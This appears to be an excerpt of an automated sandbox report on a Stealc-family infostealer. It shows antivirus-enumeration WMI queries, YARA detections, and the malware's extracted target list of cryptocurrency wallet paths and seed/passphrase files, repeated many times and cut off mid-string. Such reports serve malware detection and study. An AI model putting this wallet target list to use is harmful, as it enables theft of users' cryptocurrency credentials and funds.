Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE Jump to behavior
Source: svchost.exe, 00000005.00000002.3779242730.0000015550702000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000005.00000002.3779242730.0000015550702000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 13.2.axplong.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.axplong.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.axplong.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.file.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1425044391.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1376722618.0000000000A01000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1397149648.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.1830413702.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1285449632.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1356529894.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.1384745140.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2190552389.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2193872573.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Offnewhere.exe PID: 7260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new_v8.exe PID: 2864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 550b7cfe5f.exe PID: 5732, type: MEMORYSTR
Source: Yara match File source: 17.0.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1886878201.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1886855224.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local 